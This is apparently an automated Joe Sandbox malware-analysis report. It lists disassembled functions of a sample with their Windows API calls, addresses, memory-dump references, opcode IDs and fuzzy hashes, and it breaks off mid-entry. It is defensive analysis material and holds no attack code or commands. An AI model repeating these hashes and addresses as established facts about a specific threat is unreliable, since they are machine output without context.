                                                                          Function 0039B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039B192
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0039B1B7
                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0039B1CF
                                                                          • GetSystemMetrics.USER32(00000004), ref: 0039B1F8
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00380E90,00000000), ref: 0039B216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 2294984445-0
                                                                          • Opcode ID: df2551875b8913cc4db2fb33fb0fc6b307fa7cdc0ee309afd7d469efc6ef7d0a
                                                                          • Instruction ID: 65362ea01b5d976bbd6038c420f79f6a82b7e00ceb75d272ff2e6a9a2b298249
                                                                          • Opcode Fuzzy Hash: df2551875b8913cc4db2fb33fb0fc6b307fa7cdc0ee309afd7d469efc6ef7d0a
                                                                          • Instruction Fuzzy Hash: CA21A371A10255AFCF169F38ED44A6AB7A8FB05361F124B39F972D71E0D7309820DB90
                                                                          Function 00369307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00369320
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00369352
                                                                          • __itow.LIBCMT ref: 0036936A
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00369392
                                                                          • __itow.LIBCMT ref: 003693A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow$_memmove
                                                                          • String ID:
                                                                          • API String ID: 2983881199-0
                                                                          • Opcode ID: 50833497e80fa7fa8d9ac5a4028965f3d8bcdc5248010c31d7fb7bbeaef51517
                                                                          • Instruction ID: 2e536c5de38b8138d78da269538bd0708467cdd3513b95550c2dd41c967f5ed1
                                                                          • Opcode Fuzzy Hash: 50833497e80fa7fa8d9ac5a4028965f3d8bcdc5248010c31d7fb7bbeaef51517
                                                                          • Instruction Fuzzy Hash: D1210435700208BBDB12AB618C89FEE3BACEB49710F148026FD05DB2C0D6B0CD558791
                                                                          Function 00385A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindow.USER32(00000000), ref: 00385A6E
                                                                          • GetForegroundWindow.USER32 ref: 00385A85
                                                                          • GetDC.USER32(00000000), ref: 00385AC1
                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00385ACD
                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00385B08
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ForegroundPixelRelease
                                                                          • String ID:
                                                                          • API String ID: 4156661090-0
                                                                          • Opcode ID: 975251ebbbe3ca28b06fd3736aed854355550240fff166b909ac8012d982796a
                                                                          • Instruction ID: 3940983e57430fadb58425ffebe55c45ff63dd262b6e12dd4a3cbd4aaf620774
                                                                          • Opcode Fuzzy Hash: 975251ebbbe3ca28b06fd3736aed854355550240fff166b909ac8012d982796a
                                                                          • Instruction Fuzzy Hash: B9216235A00204AFD715EF65D888A9AB7E9EF4C350F14C479F809D7351CA75AD41CB90
                                                                          Function 003112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0031134D
                                                                          • SelectObject.GDI32(?,00000000), ref: 0031135C
                                                                          • BeginPath.GDI32(?), ref: 00311373
                                                                          • SelectObject.GDI32(?,00000000), ref: 0031139C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: 126393ee1706014aff1e47ace65970f0dcec6ddd11328c73879ccc09051aa587
                                                                          • Instruction ID: d06aa5c1564c63f2cd4a316d50bb9062542d3137b05969c2225fa53a29c92892
                                                                          • Opcode Fuzzy Hash: 126393ee1706014aff1e47ace65970f0dcec6ddd11328c73879ccc09051aa587
                                                                          • Instruction Fuzzy Hash: 7D215930A02618EFDB179F25EC047E97BACEB04322F154627E9209A5B4D3719891EF90
                                                                          Function 0036BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: 319e9c9d51066d03b677ad501bc8eb51e7a7864197fe5114ddaa2f7f1067154f
                                                                          • Instruction ID: e9cccadbe3d7e0ca518b7dcae8aae6419c2e5ac071b81080b64b57197c2997ea
                                                                          • Opcode Fuzzy Hash: 319e9c9d51066d03b677ad501bc8eb51e7a7864197fe5114ddaa2f7f1067154f
                                                                          • Instruction Fuzzy Hash: E801B5726401157BD2076B1A6D82FFBF36CDE52798F048021FE05DA24AEB61DF508AA4
                                                                          Function 00374A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00374ABA
                                                                          • __beginthreadex.LIBCMT ref: 00374AD8
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00374AED
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00374B03
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00374B0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 3824534824-0
                                                                          • Opcode ID: dc71ec2eac64188ceb38dc7af984b677dbf60f925d50f50328b5424feec618e4
                                                                          • Instruction ID: 926c53c9c02898a77806920f9dd94480ba2970d418df0c0081265b7d57e92fa0
                                                                          • Opcode Fuzzy Hash: dc71ec2eac64188ceb38dc7af984b677dbf60f925d50f50328b5424feec618e4
                                                                          • Instruction Fuzzy Hash: 3E110876905214BFC7139FA8AC04A9B7FACEB45321F15826AF818D3250D775DD0487E0
                                                                          Function 00368202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0036821E
                                                                          • GetLastError.KERNEL32(?,00367CE2,?,?,?), ref: 00368228
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00367CE2,?,?,?), ref: 00368237
                                                                          • HeapAlloc.KERNEL32(00000000,?,00367CE2,?,?,?), ref: 0036823E
                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368255
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 842720411-0
                                                                          • Opcode ID: 77670e0cc1b74f2de1aedbc73e7a92ba5962bae0c930dd5c9be74f48f722f09a
                                                                          • Instruction ID: 0b690e104c362f1f6512ef1e4bab348f9f218bd49d114bfe255e2c9c4b101c2b
                                                                          • Opcode Fuzzy Hash: 77670e0cc1b74f2de1aedbc73e7a92ba5962bae0c930dd5c9be74f48f722f09a
                                                                          • Instruction Fuzzy Hash: 030181B1205604FFDB224FA5DC48D6B7FACEF8E755B50492AF809C3220DB328C50CA60
                                                                          Function 0036710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?,?,00367455), ref: 00367127
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367142
                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367150
                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?), ref: 00367160
                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 0036716C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 3897988419-0
                                                                          • Opcode ID: 814a535c7e8faf91d085d080f33c54c9ff963f06d21ec21489ac4630cc01f376
                                                                          • Instruction ID: cbccdb662c7d628285c3fee8b0a8ac250d8020a78eeee8e59821519ea57cafad
                                                                          • Opcode Fuzzy Hash: 814a535c7e8faf91d085d080f33c54c9ff963f06d21ec21489ac4630cc01f376
                                                                          • Instruction Fuzzy Hash: 1601F2B2604204BFDB124F24DC48BAA7BFCEF45795F158066FD08D2224D772DD408BA0
                                                                          Function 00375244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375260
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0037526E
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375276
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00375280
                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 67250fa737d6c2ab09c035c5089e787e8bf33c615201592e15ef58801681fd43
                                                                          • Instruction ID: 4bbdd92f8bd00bc2f382954be5c1c60abc23af0eca36f0ab9345c37d59cc2d39
                                                                          • Opcode Fuzzy Hash: 67250fa737d6c2ab09c035c5089e787e8bf33c615201592e15ef58801681fd43
                                                                          • Instruction Fuzzy Hash: 6701AD31C01A1DDBCF16EFE4D8485EDBB7CFB08301F004856E945F2142CB7555108BA5
                                                                          Function 0036810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368121
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0036812B
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0036813A
                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368141
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368157
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 09c4d0fac9149d1c2c3d7169e97139db8dfb87d581e5d879fc799f6ae545112a
                                                                          • Instruction ID: 7e29f6e322f9b6790040b366e5128e64c1e25491a56305d101185c36f049ec73
                                                                          • Opcode Fuzzy Hash: 09c4d0fac9149d1c2c3d7169e97139db8dfb87d581e5d879fc799f6ae545112a
                                                                          • Instruction Fuzzy Hash: D4F06275200304BFEB221FA5EC99E6B3BACFF4A758F104126F945C6160CB62DD51DA60
                                                                          Function 0036C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0036C1F7
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0036C20E
                                                                          • MessageBeep.USER32(00000000), ref: 0036C226
                                                                          • KillTimer.USER32(?,0000040A), ref: 0036C242
                                                                          • EndDialog.USER32(?,00000001), ref: 0036C25C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 917c9fca5476e752ab14c3b3d20b7936bd270add40b6f1b3125a3c9909f81ec8
                                                                          • Instruction ID: 41990c62fc85f55af539b054dec4028548f73ed9075746bd815411d7db6c5f55
                                                                          • Opcode Fuzzy Hash: 917c9fca5476e752ab14c3b3d20b7936bd270add40b6f1b3125a3c9909f81ec8
                                                                          • Instruction Fuzzy Hash: 8201A7305143049BEB226B60DD5EBA6777CBB00705F04466AA982D14E0D7F569548B90
                                                                          Function 003113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EndPath.GDI32(?), ref: 003113BF
                                                                          • StrokeAndFillPath.GDI32(?,?,0034B888,00000000,?), ref: 003113DB
                                                                          • SelectObject.GDI32(?,00000000), ref: 003113EE
                                                                          • DeleteObject.GDI32 ref: 00311401
                                                                          • StrokePath.GDI32(?), ref: 0031141C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: cdc0c3434ddf66cab1efebeb8eccd9fd6d9c2717a9e5b522d6650f1f16118973
                                                                          • Instruction ID: 1ec7f46ab3f2bcaf44417b82335a6b27739bfb4cddbbeb9dada6f412736b865a
                                                                          • Opcode Fuzzy Hash: cdc0c3434ddf66cab1efebeb8eccd9fd6d9c2717a9e5b522d6650f1f16118973
                                                                          • Instruction Fuzzy Hash: 2DF0C934106B08EFDB275F26EC4C7983BACAB05726F188226E529895F1C73159A5EF50
                                                                          Function 0037C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0037C432
                                                                          • CoCreateInstance.OLE32(003A2D6C,00000000,00000001,003A2BDC,?), ref: 0037C44A
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • CoUninitialize.OLE32 ref: 0037C6B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                          • String ID: .lnk
                                                                          • API String ID: 2683427295-24824748
                                                                          • Opcode ID: 1242629dfa5e6905d068ceed539184b25e10450893eeb423bbb81f961119bc53
                                                                          • Instruction ID: 5a8c092144fb7bd5c3eff0f92c8bca73e93f05c1931a38c3004a8c81e6360bd0
                                                                          • Opcode Fuzzy Hash: 1242629dfa5e6905d068ceed539184b25e10450893eeb423bbb81f961119bc53
                                                                          • Instruction Fuzzy Hash: 6BA14A71108205AFD705EF64C891EAFB7ECEF89354F00491DF1568B1A2EB71EA49CB62
                                                                          Function 00322CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
                                                                            • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 00317A51: _memmove.LIBCMT ref: 00317AAB
                                                                          • __swprintf.LIBCMT ref: 00322ECD
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00322D66
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 1943609520-557222456
                                                                          • Opcode ID: faa23519e81172c50423e2b615be36032ce4a3aa658a96925e797aad1981bdd2
                                                                          • Instruction ID: 4ba0f64a5cb3f614567fd4196a85f8c3a9cdda0d0d5c6ae7fdf229c5bc8ee4a0
                                                                          • Opcode Fuzzy Hash: faa23519e81172c50423e2b615be36032ce4a3aa658a96925e797aad1981bdd2
                                                                          • Instruction Fuzzy Hash: 44916171108211AFC71AEF24D896CAFB7B8EF99710F05491DF8559B2A1EB30ED48CB52
                                                                          Function 0037B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                          • CoInitialize.OLE32(00000000), ref: 0037B9BB
                                                                          • CoCreateInstance.OLE32(003A2D6C,00000000,00000001,003A2BDC,?), ref: 0037B9D4
                                                                          • CoUninitialize.OLE32 ref: 0037B9F1
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
